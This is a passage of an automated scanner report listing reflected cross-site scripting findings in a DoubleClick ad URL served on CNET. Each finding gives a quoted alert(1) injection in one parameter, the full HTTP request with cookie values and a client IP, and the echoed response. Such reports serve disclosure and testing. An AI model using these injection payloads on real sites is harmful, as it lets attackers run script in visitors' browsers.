GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
66%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_13
...[SNIP]...

3.121. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2cf'-alert(1)-'434cc702ff0 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
66%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.122. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd276"-alert(1)-"9e7d663adcd was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.123. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4884'-alert(1)-'1fd9fbb2e3b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://
...[SNIP]...

3.124. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a62"-alert(1)-"491575274f was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54538

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;

...[SNIP]...

3.125. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97230'-alert(1)-'d278434a2 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54534

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.126. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d51"-alert(1)-"68a22fe282e was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 54533
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:15 GMT
Expires: Wed, 27 Apr 2011 23:22:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyImpUrl = "";
this
...[SNIP]...

3.127. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86835'-alert(1)-'acccea5abcb was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 54530
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:16 GMT
Expires: Wed, 27 Apr 2011 23:22:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcbhttp://www.blackberry.com">
...[SNIP]...

3.128. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1c7"-alert(1)-"3bd2dbe41e8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.129. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f446'-alert(1)-'ad85bf69864 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2
...[SNIP]...

3.130. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9916'-alert(1)-'a98a38d25af was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

